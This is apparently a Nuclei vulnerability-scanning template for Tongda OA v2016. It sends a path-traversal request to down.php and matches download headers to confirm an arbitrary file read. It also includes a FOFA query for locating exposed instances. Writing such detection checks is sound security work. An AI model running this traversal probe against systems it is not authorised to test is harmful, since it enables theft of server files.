id: tongda-oa-down-fileread

info:
  name: 通达 OA v2016 down.php - fileread
  author: pphua
  severity: high
  description:
  reference:
    - todo
  metadata:
    verified: true
    fofa-query: app="TDXK-通达OA" || icon_hash="-759108386" || icon_hash="1967132225"
  tags: tongda,oa,fileread,2016

http:
  - raw:
      - |
        HEAD /inc/package/down.php?id=../../../cache/org HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "contains(all_headers,'attachment') && contains(all_headers,'octet-stream')"